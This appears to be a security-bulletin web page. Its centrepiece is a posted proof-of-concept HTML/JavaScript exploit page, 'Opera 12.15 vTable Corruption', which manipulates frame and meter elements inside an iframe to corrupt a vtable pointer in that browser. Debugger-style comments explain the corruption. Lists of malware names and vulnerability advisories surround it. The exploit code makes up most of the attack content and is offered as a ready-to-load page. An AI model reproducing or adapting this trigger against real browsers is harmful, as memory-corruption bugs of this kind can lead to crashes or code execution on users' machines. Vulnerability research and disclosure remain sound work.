Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
07/02/2013
Opera 12.15 vtable Corruption<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Download</title> </head> <body> <iframe id="wnd"></iframe> <script type="text/javascript" language="JavaScript"> /* Title: Opera 12.15 vTable Corruption Author: echo Test: Windows 7 x64 Version: Opera 12.15 Win32 Link: www.opera.com */ var wnd = document.getElementById("wnd"); wnd = wnd.contentWindow; function d00m() { var tag = []; tag.push(document.createElement("frame")); tag.push(document.createElement("meter")); wnd.document.body.appendChild(tag[0]); wnd.document.body.appendChild(tag[1]); /* step 1*/ var obj = tag[1]; var obj_1 = tag[0]; try{ obj_1.appendChild(obj); }catch(b){} /* eax = [esi + 14h] = this->unknow20 */ try{ obj_1.getBoundingClientRect(); }catch(a){} /* ecx = [eax + 14h] = this->unknow20->unknow20 */ /* eax = [ecx] = this->unknow20->unknow20[vtBl] (correnct) */ /* step 2*/ var obj = tag[0]; var obj_1 = tag[1]; try{ obj_1.appendChild(obj); }catch(b){} try{ obj_1.getBoundingClientRect();}catch(a){} /* eax = [esi + 14h] = this->unknow20 */ /* ecx = [eax + 14h] = this->unknow20->unknow20 */ } /* eax = [ecx] = this->unknow20->unknow20[vtBl] (uncorrect) 0x00000000 reference */ d00m(); /* so we have here some kind of memory corruption */ /* in "step 1" "vulnerable" code works fine he gets refernce to vtable and do some stuff */ /* in "step 2" the same code do the same thing but vtable of refernced object is corrupted and has value 0x0000000*/ /* logically next step should be checking why the vtable in "step 2" is corrupted */ /* i observed heap allocation and free function between "step 1" and "step 2" - no alloc and free of intersting area occurs (but maybe i fuckup something) */ /* We also can set mem access breakpoint on [eax+14h] at the right moment to find out what corrupt vtable */ </script> <!--088241c155f232f70fcae7020157b9dcff210b84--> </body> </html> |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |